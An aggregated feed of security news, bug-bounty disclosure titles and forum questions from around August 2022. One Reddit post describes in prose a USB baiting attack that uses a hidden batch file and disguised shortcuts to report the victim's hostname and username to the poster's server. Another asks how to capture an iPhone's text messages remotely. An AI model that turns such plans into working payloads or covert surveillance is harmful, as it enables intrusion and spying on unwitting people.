    Okay so i have this old neighbour ( lets call him A) that i had added on my Instagram account a while back but then we fell out and i blocked him . But then a couple months ago a received a message from an account which went by his name and he asked me to give him my Instagram account’s password and my phone number to help him recover his hacked account and i after going back and forth with him foolishly gave it to him . But after 30 minutes i realised he was going through my dms so I immediately blocked the account and changed all my passwords. Then i dmed A’s account , the one that i had blocked and was sure was his , and he claimed that it wasnt him and it was someone who was doing this to multiple of his followers. I have reason to believe that this is not true because i wasn’t even following him at the time and I believe the alleged fake account was him all along but i got past it and forgot about it . Now, just today I received a text by a stranger who is saying that he got a hold of A’s phone and found my chats and pictures in his gallery and is claiming that A somehow by using my phone number and my Instagram account hacked into my phone and any and every picture that i take on my phone is being saved on his phone . Now this stranger is asking for my lockscreen passwords and stuff telling me that he will help me out and “disconnect the septor” so that A no longer has access to my iphone but i ofc just blocked him because i am not ever giving any of my passwords out again and i think this too is a ruse . Although i cant help but be concerned for my privacy, so is it possible that someone can gain access to my iphone’s camera and gallery and stuff just through my Instagram account. I would really really appreciate some help here and an honest answer because i have no knowledge of anything regarding hacking and other things related to it. Thank you for reading . submitted by /u/Praise-bingus111 [link] [comments]
  • Open

    Ingress-nginx annotation injection allows retrieval of ingress-nginx serviceaccount token and secrets across all namespaces
    Kubernetes disclosed a bug submitted by amlweems: https://hackerone.com/reports/1378175 - Bounty: $2500
  • Open

    SecWiki News 2022-08-13 Review
    鼹鼠行动--针对QNAP网络存储设备的大规模攻击活动分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-13 Review
    鼹鼠行动--针对QNAP网络存储设备的大规模攻击活动分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    How I Hacked my Car
    submitted by /u/CyberMasterV [link] [comments]
    How Cisco got Hacked - Tracking the attacker steps and the logs it generates
    submitted by /u/jwizq [link] [comments]
  • Open

    Process injection breaking all macOS security layers with a single vulnerability
    Article URL: https://sector7.computest.nl/post/2022-08-process-injection-breaking-all-macos-security-layers-with-a-single-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=32449426 Points: 2 # Comments: 0
  • Open

    Who "Owns" Your Infrastructure?
    That's a good question. You go into work every day, sit down at your desk, log in...but who actually "owns" the systems and network that you're using? Is it you, your employer...or someone else? Anyone who's been involve in this industry for even a short time has either seen or heard how threat actors will modify an infrastructure to meet their needs, enabling or disabling functionality (as the case may be) to cover their tracks, make it harder for responders to track them, or to simply open new doors for follow-on activity. Cisco (yes, *that* Cisco) was compromised in May 2022, and following their investigation, provided a thorough write-up of what occurred. From their write-up: "Once the attacker had obtained initial access, they enrolled a series of new devices for MFA and authenticated…
  • Open

    Filesystem Fuzzing and Responsible Disclosure
    Article URL: https://lwn.net/SubscriberLink/904293/deab9aedc5522142/ Comments URL: https://news.ycombinator.com/item?id=32448962 Points: 1 # Comments: 0
  • Open

    ww1 footage in .swf format
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    An interesting voice confusion discovery in Meta bug bounty
    No content preview
    Server Side Template Injections By Hashar Mujahid.
    No content preview
  • Open

    An interesting voice confusion discovery in Meta bug bounty
    No content preview
    Server Side Template Injections By Hashar Mujahid.
    No content preview
  • Open

    An interesting voice confusion discovery in Meta bug bounty
    No content preview
    Server Side Template Injections By Hashar Mujahid.
    No content preview

  • Open

    Server Side Template Injections By Hashar Mujahid.
    In this blog, we are going to learn bout what server-side template injections are and how they work by solving Portswiggers labs. Continue reading on InfoSec Write-ups »
    How I found an XSS vulnerability via using emojis
    An unusual type of Cross-Site Scripting vulnerability made by emoticons Continue reading on Medium »
    Hướng dẫn tham gia testnet SynFutures V2
    Tổng quan về SynFutures Continue reading on Medium »
    File Upload Bypass to RCE == $$$$
    Multiple ways to Bypass a File upload feature and chain it to an RCE. Continue reading on Medium »
    Amazon Cognito misconfiguration lead to account takeover
    Hello reader, I hope you are doing well. Today I want to talk about one of my findings. It was a public program and the bug is not fixed… Continue reading on Medium »
    ALEX2 Orderbook: Testnet with Bug Bounty rewards and more
    Testnet of a decentralized exchange from the ALEX2 project. Continue reading on Medium »
    How HTML Injection in email got me my first SWAG…
    Namaste!! It’s me yours Aakash Tayal (Spoopyghost) this is my second write-up or we can say first write-up because my first write-up in… Continue reading on Medium »
    Bypassing Multiple 403 Response Type Pages
    Description: Continue reading on Medium »
    Browser Extensions which have landed $$$ !
    What’s up everybody. My name is Sagar Sajeev. Continue reading on Medium »
  • Open

    Practice images
    Hi All. Reaching out to the community to see if you have any references for where to obtain free or cheap mock compromised server/computer/memory images to practice your forensic skills on. I’m a GCFE/GCFA holder but don’t get to directly utilize the level of forensic knowledge that is covered in those classes on a daily basis at work. I don’t want my knowledge and skills to lapse though and would like to practice on some images from time to time to keep those skills fresh. I’m hoping there might be some resources out there that allow for this. Thank you! submitted by /u/Ckn0wt [link] [comments]
    Forensic 4:cast Awards Creation Video
    submitted by /u/Schizophreud [link] [comments]
    TCU Hashtopolis (2022AUG08)
    The latest "TCU Hashtopolis" (2022AUG08) has been released. This live distro automatically initializes the Hashtopolis Linux agent and adds it to your Hashtopolis cluster. This release includes a SSH server (u:user, p:live) so you can login to debug the agent if required which can be particularly helpful when a Hashtopolis task fails to benchmark your agent and the agent pulls itself out of the cluster. It also has hashcat included so if you stop the Passware Linux agent you can use it for direct hashcat jobs. See the README.pdf for more info. https://drive.google.com/drive/folders/1xkDBNCr-KBg8FTMvTc70sxm0nr-6qYCG?usp=sharing submitted by /u/atdt0 [link] [comments]
    Can anyone recommend best way to capture cell phone text messages remotely?
    I don’t do this often. When I’m asked to I wing it most of the time. We are trying to see if there are options besides going to the person to do the capture. This person has an iPhone. Thanks. submitted by /u/hw60068n [link] [comments]
  • Open

    wtf is security-enabled global group
    hey folks, I have alerts in my SIEM based on event ID 4728. Seems that there is similar log 4732. I understand someone added to some group in ad, but what is considered "security-enabled" in practice? You need to config in settings of ad object that it will be considered as security-enabled ? The group considered automatically when it have some high permission to something? Thanks. submitted by /u/Webly99 [link] [comments]
    Does the US govt really pay for information?
    https://www.bleepingcomputer.com/news/security/us-govt-will-pay-you-10-million-for-info-on-conti-ransomware-members/ Saw that article today and it made me wonder if they really pay. I remember someone said they never do but, I can't remember who. submitted by /u/Chroll-On [link] [comments]
    Partner company requesting we get our client cert for 2-way SSL handshake be signed by a trusted CA. Am I crazy or is that pointless?
    As the title suggests. They asked for a client cert they could trust for 2 way SSL, and when I gave them my self-signed cert they were concerned and said they couldnt accept self-signed certs. I am baffled as to why this is necessary, but before blindly thinking I know best I wanted to ask the community. Are there situations or reasons why this would make sense? submitted by /u/grasponcrypto [link] [comments]
    Dealing with Old Servers
    Any advice for dealing with old servers that can’t be (easily) upgraded for various reasons? We’ve a handful of servers that are running old versions of CentOS and Debian - old old, like Centos 5 and 6 old. Even if Centos as a project hadn’t gone the way of the dodo, these servers wouldn’t be getting security updates any more. The obvious thing to do would be to migrate whatever they’re hosting to new servers and shut off the old ones, but logistically that’s not really a runner - at least not quickly. They’re running old, but still used, PHP applications built on old versions of Zend; updating these applications to work with more recent versions of PHP or retiring them entirely is a work in progress. In the meantime the servers have sometimes hundreds of vulnerabilities each. Any suggestions on what I can do to reduce the attack surfaces in the absence of being able to update/retire them? submitted by /u/deadlock_ie [link] [comments]
    SANS Grad Cert Purple Team Operations vs Cyber Defense Operations
    Hey all! I want to pick your brains on a topic. So, I'm looking into getting a SANS grad cert but it's a toss-up between the two in the title. I have done my research and found that either of these will fit my goal. I can honestly go either way but would like to get insight as to which one would be better over the two. I have around 5 or 6 years of cybersecurity experience and I've held a SOC title before. However, I would like to get more involved in both red/blue team shenanigans when possible lol. My company (thank the stars) is paying for this and I can always take more SANS courses with my education assistance program. So, filling in the blanks on areas I may not know won't be a problem. Now that..that is out of the way. I would like to get your thoughts on those cert programs as well as the pros/cons of them. I'm currently waiting on my GCIH material so once I pass that I will be entering one of these programs. I am very interested in having knowledge in pen-testing as well as advanced defenses and techniques. The CDO has courses that are very interesting and the certs I would get out of it are GREAT! and will really fortify my knowledge of hardening and automation. But the purple team has a little bit of both which will help me bridge the gap in some areas I'm weak in right now. (Side note: I wanted to do the pentest path but I'm not ready for that yet. So, I'll just take certs when I can after I complete one of the grad certs lol). Please don't judge my ADHD brain is all over the place right now hahaha. Hope to get some good feedback and hope that I explained my situation well enough. submitted by /u/StoneyW [link] [comments]
  • Open

    Intelligence and IGR: how companies dealing with the State can improve their decision making
    The private representation of interests before public entities, although a historically recurring fact, has been intensified locally in… Continue reading on Medium »
    ESG and Greenwashing: how to mitigate the risk between suppliers and third parties
    A company commits Greenwashing when it omits or lies about the environmental impacts of its products. Continue reading on Medium »
    Why do you need an ally? — 5 reasons to hire a company to investigate your debtor’s patrimony
    The market dynamics are not always harmonious: while some contracts are successfully closed, others are finished by one of the parties for… Continue reading on Medium »
    How to identify fraud against creditors and recover assets efficiently?
    As is well known, one of the biggest issues in execution proceedings or even in compliance with a court sentence is the creditor’s search… Continue reading on Medium »
    The emergence of OSINT: how news analysis in WW2 influenced open-source search
    In view of the needs that have grown along with the technological advance, the demand for means of obtaining and filtering data for… Continue reading on Medium »
  • Open

    Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER
    submitted by /u/chicksdigthelongrun [link] [comments]
    Security Implications of URL Parsing Differentials
    submitted by /u/monoimpact [link] [comments]
    capa v4: casting a wider .NET
    submitted by /u/sanitybit [link] [comments]
    Researching TEE payment system built into Xiaomi smartphones powered by MediaTek
    submitted by /u/sanitybit [link] [comments]
    DNSMonitor leverages Apple's Network Extension Framework to monitor DNS requests and responses
    submitted by /u/sanitybit [link] [comments]
    The cloud has an isolation problem: PostgreSQL vulnerabilities affect multiple cloud vendors | Wiz Blog
    submitted by /u/juken [link] [comments]
    What Happened to Lapsus$
    submitted by /u/TravenDev [link] [comments]
  • Open

    Useful redteam github links
    https://github.com/A0RX/Red-Blueteam-party https://github.com/MantisSTS/RedTeamTools https://github.com/idchoppers/redTeaming https://github.com/irredteam/irredteam.github.io https://github.com/0xMrNiko/Awesome-Red-Teaming https://github.com/J0hnbX/RedTeam-Resources submitted by /u/ff6764 [link] [comments]
    Wifi Traffic Analysis in Wireshark
    submitted by /u/tbhaxor [link] [comments]
  • Open

    SecWiki News 2022-08-12 Review
    Black Hat 2022上最值得关注的十大议题 by ourren 谈谈安全对抗的本质 by ourren 云沙箱视角看攻防演练:样本类攻击手法总结 by ourren 智能系统数据安全 by ourren Selenium自动化入坑指南 by ourren 浅谈NFT, Web3 和元宇宙 by ourren DevOps风险测绘之代码篇 by ourren “无数据知识蒸馏”术语 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-12 Review
    Black Hat 2022上最值得关注的十大议题 by ourren 谈谈安全对抗的本质 by ourren 云沙箱视角看攻防演练:样本类攻击手法总结 by ourren 智能系统数据安全 by ourren Selenium自动化入坑指南 by ourren 浅谈NFT, Web3 和元宇宙 by ourren DevOps风险测绘之代码篇 by ourren “无数据知识蒸馏”术语 by ourren 更多最新文章,请访问SecWiki
  • Open

    Help executing the PoC for CVE-2022-22582
    Ok so I'm trying to execute the cve that I referenced on my local mac (version 11.6.1). I've looked at the original PoC at http://www.github.com/poizon-box/CVE-2022-22582. This doesn't produce any errors, but the exploit is supposed to take advantage of symlinks to overwrite priviledged files, anf I don't understand how that's supposed to work. If you couls help me it would be very appreciated. submitted by /u/GuillotineNamedJEff [link] [comments]
    Linux kernel exploitation series (if you know Japanese or trust Google translate)
    submitted by /u/0xor0ne [link] [comments]
  • Open

    Reflected XSS at https://stories.showmax.com/wp-content/themes/theme-internal_ss/blocks/ajax/a.php via `ss_country_filter` param
    Showmax disclosed a bug submitted by miron666: https://hackerone.com/reports/1663202 - Bounty: $150
  • Open

    CVE-2020–15139: From Self-XSS to Persistent DOM-XSS
    My journey into discovering CVE-2020–15139 Continue reading on Medium »
  • Open

    从一个App到getshell的一次经历
    在一次授权渗透测试中,得知测试目标是拿到权限或者关键用户数据。
    何艺:一个甲方安全创业者的自白
    持安科技创始人&CEO何艺,受邀参会并分享《一个甲方安全创业者的自白》
    数据库注入提权总结(四)
    权限是用户对一项功能的执行权力。
    国密wget的用法指南
    ​ wget 是一个GNU开发的从网络上自动下载文件的自由工具。
    企业数据安全治理1+3+1+1
    企业数据安全治理是一项庞杂和繁重的工作,尤其在数安与网络安全、应用安全高度耦合的背景下,更具有极大的挑战性,需要一盘棋考量。
    2022年全球网络威胁报告
    来源:Acronis作者:Alexander Ivanyuk(Acronis 产品与技术定位部资深总监)Candid Wuest(Acronis 网络防护研究部副总裁)目  录简介与摘要第一部分:2021年主要网络威胁和趋势第二部分:常见恶意软件威胁第三部分:Windows 操作系统和软件中的漏洞第四部分:2022 年安全预测第五部分:Acronis 就如何在当前和今后的威胁环境中保持安全提出的建
    银行木马SOVA卷土重来,或可发起勒索攻击
    肆虐Android平台的银行木马 SOVA 卷土重来,和之前相比增加了更多的新功能,甚至还有可能进行勒索攻击。
    美国悬赏1000万美元,征集Conti成员信息
    美国国务院今天宣布悬赏1000万美元征集5名Conti勒索软件高级成员的信息。
    涉及金额5.4亿美元,网络犯罪分子正通过 RenBridge 跨链平台洗钱
    该平台允许在不同的区块链网络之间无缝移动资产,例如将比特币转换为以太坊区块链。
  • Open

    What is Fuzz Testing? Definition, History, Uses and Importance.
    Sometimes, software security seems to be created with a loophole for attackers to exploit, various ways to manage such vulnerabilities… Continue reading on Medium »
  • Open

    What is Fuzz Testing? Definition, History, Uses and Importance.
    Sometimes, software security seems to be created with a loophole for attackers to exploit, various ways to manage such vulnerabilities… Continue reading on Medium »
  • Open

    Configuring TOR with Python
    No content preview
    Let’s Learn API Security: More about Excessive Data Exposure
    We are going to talk about “Excessive Data Exposure” in this post that we are making for API Security. Continue reading on InfoSec Write-ups »
  • Open

    Configuring TOR with Python
    No content preview
    Let’s Learn API Security: More about Excessive Data Exposure
    We are going to talk about “Excessive Data Exposure” in this post that we are making for API Security. Continue reading on InfoSec Write-ups »
  • Open

    Configuring TOR with Python
    No content preview
    Let’s Learn API Security: More about Excessive Data Exposure
    We are going to talk about “Excessive Data Exposure” in this post that we are making for API Security. Continue reading on InfoSec Write-ups »
  • Open

    New Vulnerability Affects All AMD Zen CPUs: Threading May Need to Be Disabled
    Article URL: https://www.tomshardware.com/news/new-vulnerability-affects-all-amd-zen-cpus Comments URL: https://news.ycombinator.com/item?id=32434119 Points: 3 # Comments: 1

  • Open

    Sketchy colleague stuck a non-work-related USB drive in my work macbook without my consent and pulled it out before I could see what he was doing, what should I look out for/include in my report to T&S?
    I'm not in netsec myself. A shady colleague recently asked me if he could "check something" on a macbook I use at work. I asked what it was and he said it was photos related to his side-gig (artist). I said "No, I'm not comfortable with that, why not check it on your own laptop?", but I wasn't standing close enough to my desk to physically stop him. he said "It'll just take a minute" and stuck a USB drive in my macbook. 100% my fault for leaving it unlocked, I was literally 3 feet away on the other side of a half-height cubicle wall helping a colleague with a question at their desk, and I should know better. As soon as I saw him stick the drive in I walked back toward my desk, when I got close enough to see the screen he yanked it out and said "That's all I needed, thanks" and walked away. I plan on contacting our trust & safety team, but because of this colleague's position they will see the report at the same time the T&S team does, and because of previous experiences with this colleague I fully expect that (a) there was something malicious on the drive and (b) they'll start working on a cover story immediately after I send my report. What can I look for as evidence that something malicious happened (if something malicious did actually happen) before reporting it, so that it can be included in the report, and minimize their time to come up with a cover story for anything objectionable they did? For all I know it was innocent (just checking color profiles of some photographed works on a retina screen or something? idk) but given the fact that I asked him not to and he did anyway (as well as past experience with this guy) I'm suspicious. e: I know virtually nothing about macs, just have to use one at work. submitted by /u/No_Manufacturer_4701 [link] [comments]
    Powershell relevance
    Ive rare time off and am going thru backlog of redteam trainings/materials/posts/talks/ and blogposts. I notice a lot of I notice lotta Powersploit or Powershell C2s. Esp on blogs. Those ones I understand as usually they're from individuals who doesnt have an entity bankrolling expensive toolsets. I am also aware that PSH has been quite thoroughly swisscheesed by blueteamers these days. I'm thinking it's rather irrelevant to do anything with PSH materials based on my experience using Cobalt Strike we're reliant on BOFs and .NET assys. Especially to evade sophisticated AVEDRs. Buy I've not worked in enough variety of shops yet. Tho many moons ago listen to a 10minSecurity (or might've been called 7minSecurity) podcast where it seemed like they used such tools at a commercial firm. Altho, iirc it also seemed like the owner was newly getting this firm up and new in pentesting~teaming space which is why he might be been using such tooling. TLDR: Not sure if it is worth going thru these Powersploit/Empire/other psh centered tool still? Also I've never done a NCCDC but might do one in the future for shits and giggles. Is is psh tooling they use? submitted by /u/blabbities [link] [comments]
    Monitored SOC/SIEM Questions
    Hi all, We're currently reviewing a number of solutions for a monitor SOC/SIEM. This is relatively new to me so I'm just attending meetings with my managers and vendors just for the experience. We're a small one site business , 150+ userbase, mostly Windows on prem/Azure/M365 and a firewall and VPN (which is our main tool for remote work). ​ I am wondering if there's anything in particular I should watch out for during the meetings? Is there a list of features or requirements that would be almost standard? submitted by /u/DaithiG [link] [comments]
    Media Drop / Baiting attack with USB Drive
    Hey guys, I'm working on creating a media drop off / baiting usb drive. Goal: Create a USB stick to drop it in the parking lot, at the reception or at a desk, bait the user to insert it to a computer and click on the contents - calling to my server to know they clicked. Current plan and try: I created a file called windows.bat on the drive, which is set to be hidden. The batch file basically does a curl to a specified endpoint ( a server I control, allowing me to know they opened it), which after that outputs some troll stuff, so the employee knows they got tricked. That endpoint also includes the output of "hostname" and "whoami", so I know, who it was, that clicked on it. I then created some shortcuts like "Private" (with a folder as symbol) or "Vacation-Photos of Monica" or "Tax-Report 2021" etc, that all point to that batch file. Besides the fact, that they have the shortcut arrow symbol, it looks "authentic enough" for most employees propably. The problem: those shortcuts include the drive letter, which varies from device to device. So like this, it won't work. I though about if its possible to use relative paths for the shortcut, but this doesn't seem to be too easy in windows (or basically not possible at all). Do you guys have any other idea on how to get this working? The only thing, that "the opened file" has to do is somehow access this endpoint and the user should be somehow baited in clicking and opening this tempting looking file. submitted by /u/namelessOnReddit_ [link] [comments]
    Audio Stegonography: what kind of method might have been used?
    Waveform image of a part of the audio: https://imgur.com/a/x2pkEj7 submitted by /u/AlternativeResult448 [link] [comments]
    Web-based Pcap Viewers
    I’m doing some research and want to hear what NetSec folks think of services like CloudShark and apackets.com which let you upload pcap files and analyze them. Do you use any online services to view pcap files? If not, is sending traffic captures to a third-party the biggest concern? submitted by /u/codebyamir [link] [comments]
    Why would an attacker send GET requests for NSFW/porn websites from external IPs into the victim’s DMZ when they have nothing to do with that kind of content?
    The host field contains porn sites, but the destination IP is the victim company. submitted by /u/Free-Roaming-Orange [link] [comments]
  • Open

    Disabling context isolation, nodeIntegrationInSubFrames using an unauthorised frame.
    Internet Bug Bounty disclosed a bug submitted by s1r1u5: https://hackerone.com/reports/1647287 - Bounty: $2400
    Admin panel Exposure without credential at https://plus-website.shopifycloud.com/admin.php
    Shopify disclosed a bug submitted by 0x50d: https://hackerone.com/reports/1417288 - Bounty: $2900
    Wordpress Users Disclosure (/wp-json/wp/v2/users/)
    Top Echelon Software disclosed a bug submitted by hammodmt: https://hackerone.com/reports/1663363
    fix(security):Path Traversal Bug
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1664244
    Disable xmlrpc.php file
    Top Echelon Software disclosed a bug submitted by sohelahmed786: https://hackerone.com/reports/712321
    Redirection in Repeater & Intruder Tab
    PortSwigger Web Security disclosed a bug submitted by mr_vrush: https://hackerone.com/reports/1541301 - Bounty: $150
  • Open

    Researchers Find Vulnerability in Software Underlying Discord, Microsoft Teams
    Article URL: https://www.vice.com/en/article/m7gb7y/researchers-find-vulnerability-in-software-underlying-discord-microsoft-teams-and-other-apps Comments URL: https://news.ycombinator.com/item?id=32430582 Points: 1 # Comments: 0
    Baton Drop (CVE-2022-21894): Secure Boot Security Feature Bypass Vulnerability
    Article URL: https://github.com/Wack0/CVE-2022-21894 Comments URL: https://news.ycombinator.com/item?id=32429156 Points: 4 # Comments: 0
    Stats say Chinese researchers are not deterred by China's vulnerability law
    Article URL: https://www.scmagazine.com/editorial/analysis/compliance/stats-say-chinese-researchers-are-not-deterred-by-chinas-vulnerability-law Comments URL: https://news.ycombinator.com/item?id=32423207 Points: 2 # Comments: 0
  • Open

    Fully dockerized Linux kernel debugging environment
    submitted by /u/0x00rick [link] [comments]
    Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study – NCC Group Research
    submitted by /u/digicat [link] [comments]
    Hunting for Low and Slow Password Sprays Using Machine Learning (ML Deep Dive)
    submitted by /u/SCI_Rusher [link] [comments]
    Concealed code execution: Techniques and detection
    submitted by /u/darronofsky [link] [comments]
    Enhancing Subdomain Enumeration - ENTs and NOERROR
    submitted by /u/doitsukara [link] [comments]
    A deep dive into an in-the-wild Android exploit: the quantum state of Linux kernel garbage collection - CVE-2021-0920 (Part 1)
    submitted by /u/sanitybit [link] [comments]
  • Open

    Getting started with Cyber Security
    A complete roadmap for young computer security aspirants Continue reading on Medium »
    ALEX2 Orderbook: Testnet с наградами Bug Bounty и не только
    Testnet децентрализованной биржи от проекта ALEX2 Continue reading on Medium »
    JWT None Attack! O que e ? E porque occorre ?
    Todo mundo já deve ter visto o token do JWT (JSON Web Token) normalmente usado pra autenticação em SSO (Single Sign-On). O JWT e feito pra… Continue reading on Medium »
    Improper Cache Control Vulnerability
    Hello everyone🎉 !!! I hope you all are doing well. Continue reading on Medium »
    My Experience on Hacking the Dutch Government
    Hello, fellow Bug Hunters! It’s me again Jefferson Gonzales, and in this article, I’ll tell you about how I got my dream Dutch Government… Continue reading on Medium »
  • Open

    Baton Drop (CVE-2022-21894): Secure Boot Security Feature Bypass Vulnerability
    Article URL: https://github.com/Wack0/CVE-2022-21894 Comments URL: https://news.ycombinator.com/item?id=32429156 Points: 4 # Comments: 0
    The quantum state of Linux kernel garbage collection CVE-2021-0920 (Part I)
    Article URL: https://googleprojectzero.blogspot.com/2022/08/the-quantum-state-of-linux-kernel.html Comments URL: https://news.ycombinator.com/item?id=32420147 Points: 2 # Comments: 0
  • Open

    How to OSINT Russia? (even if you don’t speak Russian). Part 1 -Starter Pack
    Since the Russian invasion of Ukraine, the attention of OSINTers took a sharp turn east. A large number of “expert” accounts emerged on… Continue reading on Medium »
  • Open

    Hunting for Low and Slow Password Sprays Using Machine Learning (ML Deep Dive)
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    My Journey: From Pentest to Red Team to Blue
    I was a web application developer in 2010 when I learned about pentesting. I fell in love with the idea that I could get paid to break… Continue reading on Walmart Global Tech Blog »
    Find command for CTF players/ Penetration testers.
    The find command is among the most useful tools in the arsenal of Linux system administrators. The find command searches a directory… Continue reading on System Weakness »
  • Open

    SecWiki News 2022-08-11 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-11 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    PortSwigger Web Security Lab: SQL injection UNION attack, determining the number of columns…
    No content preview
    Hacker101 CTF — Micro CMS v1 Flag 0
    No content preview
    Phoenix Challenges — Stack Zero
    No content preview
  • Open

    PortSwigger Web Security Lab: SQL injection UNION attack, determining the number of columns…
    No content preview
    Hacker101 CTF — Micro CMS v1 Flag 0
    No content preview
    Phoenix Challenges — Stack Zero
    No content preview
  • Open

    PortSwigger Web Security Lab: SQL injection UNION attack, determining the number of columns…
    No content preview
    Hacker101 CTF — Micro CMS v1 Flag 0
    No content preview
    Phoenix Challenges — Stack Zero
    No content preview
  • Open

    突发!美的传闻被勒索攻击
    美的集团传闻遭遇勒索攻击,工厂多处电脑中了勒索病毒,导致内网系统连不上,所有文件都无法打开。
    新趋势:雇佣黑客成为一门生意
    网络犯罪已经进入了一个新的时代,黑客不再仅仅为了刺激而发起攻击。
    Sophos:首次发现三个勒索软件连续攻击同一个网络
    Sophos X-Ops在报告中称某汽车供应商的系统在5月的两周内被三个不同的勒索软件团伙入侵。
    FreeBuf周报 | 思科证实被勒索攻击;丹麦7-11门店因网络攻击而关闭
    各位Buffer周末好,以下是本周「FreeBuf周报」!
    Gartner发布2022新兴技术成熟曲线
    不断发展/扩展沉浸式体验、加速人工智能自动化和优化技术专家交付。
    FreeBuf早报 | 新的暗网市场声称与犯罪卡特尔有关;思科被燕洛网勒索软件团伙黑
    一家汽车供应商的系统在 5 月的两周内被三个不同的勒索软件团伙破坏并加密了文件。
    思科证实被勒索攻击,泄露数据2.8GB
    思科证实,Yanluowang勒索软件集团在今年5月下旬入侵了公司网络,攻击者试图以泄露被盗数据威胁索要赎金。
    深入调查揭秘钓鱼邮件背后的故事
    共同探讨”钓鱼邮件背后的故事”中解密在钓鱼邮件后隐藏的惊天玩法。
    因从事间谍活动,前Twitter员工最高可判20年监禁
    因窃取 Twitter 用户有关的私人信息,并将数据交给沙特阿拉伯政府,美国公民Ahmad Abouammo将最高面临 20 年的监禁。
  • Open

    SD card locked/decrypted?
    I have a noname SD card that comes from a car-navigation system and it contains a lot of data. It is possible get the data by connecting the card to the navigation system and to a computer at the same time. This way, the navigation system seems to unlock the card and it gets mounted by my computer. I would prefer not to use the navigation system in this process but when i connect the card to my computer only, i can't access it. There is just a generic scsi driver available. Do you know anything like this? Is it possible to "lock" or encrypt the SD card? submitted by /u/Knuust [link] [comments]
  • Open

    [Open Proxy Project] 400+ Verified Proxies every 15 minutes!
    A collection of aggregated open proxies across the internet, cross-examined and maintained every 15 minutes via automation. Link: https://Oproxy.ml Source Code: https://github.com/midhunvnadh/Open-Proxy-Project https://preview.redd.it/zib9r1kp93h91.png?width=1280&format=png&auto=webp&s=e5c9a464a4151d5028340346f2198737f55938cd submitted by /u/MidhunVNadh [link] [comments]
  • Open

    Researching the Windows Registry
    The Windows Registry is a magical place that I love to research because there's always something new and fun to find, and apply to detections and DFIR analysis! Some of my recent research topics have included default behaviors with respect to running macros in Office documents downloaded from the Internet, default settings for mounting ISO/IMG files, as well as how to go about enabling RDP account lockouts based on failed login attempts.  Not long ago I ran across some settings specific to nested VHD files, and thought, well...okay, I've seen virtual machines installed on systems during incidents, as a means of defense evasion, and VHD/VHDX files are one such resource. Further, they don't require another application, like VMWare or VirtualBox. Digging a bit further, I found this MS documen…

  • Open

    How Cisco got hacked - insights on what the attackers did
    submitted by /u/jwizq [link] [comments]
    AWSGoat is a vulnerable by design infrastructure on AWS featuring the latest released OWASP Top 10 web application security risks (2021) and other misconfigured AWS services.
    submitted by /u/sanitybit [link] [comments]
    Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling
    submitted by /u/Fugitif [link] [comments]
    Cryptominer detection: a Machine Learning approach
    submitted by /u/MiguelHzBz [link] [comments]
    DeathStalker’s continuous strike at foreign and cryptocurrency exchanges
    submitted by /u/EspoJ [link] [comments]
    BlueHound combines information about user permissions, network access and unpatched vulnerabilities to reveal the paths attackers would take if they were inside your network.
    submitted by /u/sanitybit [link] [comments]
    PowerHuntShares is designed to automatically inventory, analyze, and report excessive privilege assigned to SMB shares on Active Directory domain joined computers
    submitted by /u/sanitybit [link] [comments]
    ÆPIC Leak: Intel CPU bug able to architecturally disclose sensitive data
    submitted by /u/sanitybit [link] [comments]
    A Novel SIP Based Distributed Reflection Denial-of-Service Attack and an Effective Defense Mechanism
    submitted by /u/sanitybit [link] [comments]
    Everything In Its Right Place - Part 2
    submitted by /u/Gallus [link] [comments]
    From Shared Dash to Root Bash :: Pre-Authenticated RCE in VMWare vRealize Operations Manager
    submitted by /u/Gallus [link] [comments]
  • Open

    How I earned a $6000 bug bounty from Cloudflare
    Introduction: Continue reading on Medium »
    Defeat the HttpOnly flag to achieve Account Takeover | RXSS
    Hello folks, I’m Mohamed Tarek aka Timooon at Bugcrowd and HackerOne, In this write up I will explain how I get the victim’s session when… Continue reading on Medium »
    Email Confirmation bypass at Instagram
    This story is all about a logical vulnerability which helped me in Bypassing the email confirmation process and adding any arbitrary… Continue reading on Medium »
    403 Forbidden Bypass Leading to Admin Endpoint Access.
    Hi everyone! This is my first write-up, pardon me for any mistakes. I’ll share my tip with everyone how I was able to bypass a 403… Continue reading on Medium »
    Enhancing Subdomain Enumeration — ENTs and NOERROR
    Identifying subdomains more reliably by checking DNS status codes and empty nodes Continue reading on SSE Blog »
    Stealing Gas From dYdX, 0.5 ETH A Day
    Gas is liquid gold. Back in February 2022, we found a way to abuse a feature called “Gasless Deposits” on dYdX exchange that could allow… Continue reading on Medium »
    Tudo (na verdade o básico) sobre Directory Traversal [PT/BR]
    Hoje eu resolvi fazer um pouco diferente, normalmente eu tenho mais o hábito de escrever sobre write-ups do que sobre as vulnerabilidades… Continue reading on Medium »
  • Open

    OSSIM Python Boolean Expression
    I am trying to get ossim to send me an email when a specific file is accessed. I have already set everything up so that OSSIM will send me an email when a file is accessed BUT I am trying to make it more granular to send an email when a specific file is accessed. Currently in Define Logical Condition I have PBE: FILENAME == "D:\Depts\Shared\test.txt" This does not trigger an email when I open the file. I can see in the event logs that the event is there and if I delete out the PBE and set condition to ANY, I will receive an email after opening this file. Any suggestions? I have tried different spacing, caps/no caps, etc. It appears to work on my other Actions when I filter by specific usernames, but not for FILENAME. submitted by /u/Sufficient-Bed2280 [link] [comments]
    I change everything but again Instagram detects me !!!!
    Hi guys, I change my device, my public Dynamic IP, username, password, email, browser, app, cookies, and everything and again Instagram knows it's me, and my question was do you know IG can spot public dynamic IPs are coming from the same person or they know me another way? (because in this case I used a proxy and the problem was solved! though dynamic IP didn't help). I know of device fingerprinting but because I change everything I don't think it's the case. this case only affects me not persons in my region so it's not related to geolocation which is rough and not exact. what Instagram does is illegal in this case considering tracking this way without knowledge of the user. submitted by /u/amir_hossein0001 [link] [comments]
    Is Fortinet considered a righ risk VPN?
